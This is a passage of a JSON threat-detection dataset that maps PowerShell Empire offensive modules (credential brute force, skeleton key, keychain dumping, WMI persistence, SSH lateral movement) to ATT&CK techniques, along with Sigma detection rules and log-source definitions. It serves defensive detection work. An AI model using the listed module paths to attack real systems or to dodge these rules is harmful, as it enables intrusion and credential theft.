PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + null + ] + }, + { + "technique_id": "T1099", + "command_list": [ + "powershell/management/timestomp" + ], + "commands": [ + { + "command": "powershell/management/timestomp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/timestomp", + "ATT&CK Technique #1": "T1099", + "ATT&CK Technique #2": "", + "Technique": "Timestomp", + "Concatenate for Python Dictionary": "\"powershell/management/timestomp\": [\"T1099\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "status": "experimental", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", + "references": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware" + ], + "date": "2019/02/05", + "tags": [ + "attack.defense_evasion", + "attack.t1099" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\System\\Audit Security State Change" + }, + "detection": { + "selection": { + "EventID": 4616 + }, + "filter1": { + "ProcessName": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" + }, + "filter2": { + "ProcessName": "C:\\Windows\\System32\\VBoxService.exe" + }, + "filter3": { + "ProcessName": "C:\\Windows\\System32\\svchost.exe", + "SubjectUserSid": "S-1-5-19" + }, + "condition": "selection and not ( filter1 or filter2 or filter3 )" + }, + "falsepositives": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1178", + "command_list": [ + "powershell/persistence/misc/add_sid_history" + ], + "commands": [ + { + "command": "powershell/persistence/misc/add_sid_history", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/misc/add_sid_history", + "ATT&CK Technique #1": "T1178", + "ATT&CK Technique #2": "", + "Technique": "SID-History Injection", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/add_sid_history\": [\"T1178\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "references": [ + "https://adsecurity.org/?p=1772" + ], + "author": "Thomas Patzke, @atc_project (improvements)", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1178" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection1": { + "EventID": [ + 4765, + 4766 + ] + }, + "selection2": { + "EventID": 4738 + }, + "selection3": { + "SidHistory": [ + "-", + "%%1793" + ] + }, + "condition": "selection1 or (selection2 and not selection3)" + }, + "falsepositives": [ + "Migration of an account into a new domain" + ], + "level": "medium" + }, + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1108", + "command_list": [ + "powershell/persistence/misc/skeleton_key", + "powershell/persistence/powerbreach/deaduser", + "powershell/persistence/powerbreach/eventlog", + "powershell/persistence/powerbreach/resolver" + ], + "commands": [ + { + "command": "powershell/persistence/misc/skeleton_key", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/deaduser", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/eventlog", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/resolver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/misc/skeleton_key", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/skeleton_key\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/deaduser", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/deaduser\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/eventlog", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/eventlog\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/resolver", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/resolver\": [\"T1108\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "Login - 4624", + "Auth Logs" + ], + [ + "LMD - B9", + "Binary file metadata" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "Login - 4624", + "Auth Logs" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", NaN + ] + }, + { + "technique_id": "T1023", + "command_list": [ + "powershell/persistence/userland/backdoor_lnk" + ], + "commands": [ + { + "command": "powershell/persistence/userland/backdoor_lnk", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/userland/backdoor_lnk", + "ATT&CK Technique #1": "T1023", + "ATT&CK Technique #2": "", + "Technique": "Shortcut Modification", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/backdoor_lnk\": [\"T1023\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1110", + "command_list": [ + "powershell/recon/get_sql_server_login_default_pw", + "powershell/recon/http_login", + "powershell/situational_awareness/network/smbautobrute", + "powershell/situational_awareness/network/smbscanner" + ], + "commands": [ + { + "command": "powershell/recon/get_sql_server_login_default_pw", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/recon/http_login", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/smbautobrute", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/smbscanner", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/recon/get_sql_server_login_default_pw", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/recon/get_sql_server_login_default_pw\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/recon/http_login", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/recon/http_login\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/smbautobrute", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/smbautobrute\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/smbscanner", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/smbscanner\": [\"T1110\"]," + } + ], + "queries": [], + "possible_detections": [ + "/var/log/secure", + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://tools.kali.org/password-attacks/hydra", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1213", + "command_list": [ + "powershell/situational_awareness/host/findtrusteddocuments" + ], + "commands": [ + { + "command": "powershell/situational_awareness/host/findtrusteddocuments", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/situational_awareness/host/findtrusteddocuments", + "ATT&CK Technique #1": "T1213", + "ATT&CK Technique #2": "", + "Technique": "Data from Information Repositories", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/findtrusteddocuments\": [\"T1213\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "Application Logs" + ], + [ + "Authentication logs" + ], + [ + "Data loss prevention" + ], + [ + "Third-party application logs" + ], + [ + "Application Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Data loss prevention" + ], + [ + "Third-party application logs" + ], + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1084", + "command_list": [ + "powershell/persistence/elevated/wmi_updater" + ], + "commands": [ + { + "command": "powershell/persistence/elevated/wmi_updater", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/elevated/wmi_updater", + "ATT&CK Technique #1": "T1084", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation Event Subscription", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/wmi_updater\": [\"T1084\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "status": "experimental", + "description": "Detects creation of WMI event subscription persistence method", + "references": [ + "https://attack.mitre.org/techniques/T1084/" + ], + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "author": "Tom Ueltschi (@c_APT_ure)", + "date": "2019/01/12", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selector": { + "EventID": [ + 19, + 20, + 21 + ] + }, + "condition": "selector" + }, + "falsepositives": [ + "exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "level": "high" + }, + { + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "experimental", + "description": "Detects WMI command line event consumers", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 7, + "Image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "ImageLoaded": "wbemcons.dll" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high" + }, + { + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "experimental", + "description": "Detects file writes of WMI script event consumer", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.t1084", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "Image": "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high" + }, + { + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "experimental", + "description": "Detects a WMi backdoor in Exchange Transport Agents via WMi event filters", + "author": "Florian Roth", + "date": "2019/10/11", + "references": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "tags": [ + "attack.persistence", + "attack.t1084" + ], + "detection": { + "selection": { + "ParentImage": "*\\EdgeTransport.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + [ + "5861", + "WMI Objects" + ], + [ + "5861", + "WMI Objects" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + { + "technique_id": "T1142", + "command_list": [ + "python/collection/osx/keychaindump", + "python/collection/osx/keychaindump_chainbreaker", + "python/collection/osx/keychaindump_decrypt" + ], + "commands": [ + { + "command": "python/collection/osx/keychaindump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keychaindump_chainbreaker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keychaindump_decrypt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/collection/osx/keychaindump", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", + "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump\": [\"T1142\"]," + }, + { + "Empire Module": "python/collection/osx/keychaindump_chainbreaker", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", + "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump_chainbreaker\": [\"T1142\"]," + }, + { + "Empire Module": "python/collection/osx/keychaindump_decrypt", + "ATT&CK Technique #1": "T1142", + "ATT&CK Technique #2": "", + "Technique": "Keychain", + "Concatenate for Python Dictionary": "\"python/collection/osx/keychaindump_decrypt\": [\"T1142\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1021", + "command_list": [ + "python/lateral_movement/multi/ssh_command", + "python/lateral_movement/multi/ssh_launcher" + ], + "commands": [ + { + "command": "python/lateral_movement/multi/ssh_command", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/lateral_movement/multi/ssh_launcher", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/lateral_movement/multi/ssh_command", + "ATT&CK Technique #1": "T1021", + "ATT&CK Technique #2": "", + "Technique": "Remote Services", + "Concatenate for Python Dictionary": "\"python/lateral_movement/multi/ssh_command\": [\"T1021\"]," + }, + { + "Empire Module": "python/lateral_movement/multi/ssh_launcher", + "ATT&CK Technique #1": "T1021", + "ATT&CK Technique #2": "", + "Technique": "Remote Services", + "Concatenate for Python Dictionary": "\"python/lateral_movement/multi/ssh_launcher\": [\"T1021\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Netsh RDP Port Forwarding", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.t1021", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "netsh i* p*=3389 c*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "high" + }, + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "21", + " 23", + " 25", + " 41", + "RDP Logs" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "21", + " 23", + " 25", + " 41", + "RDP Logs" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 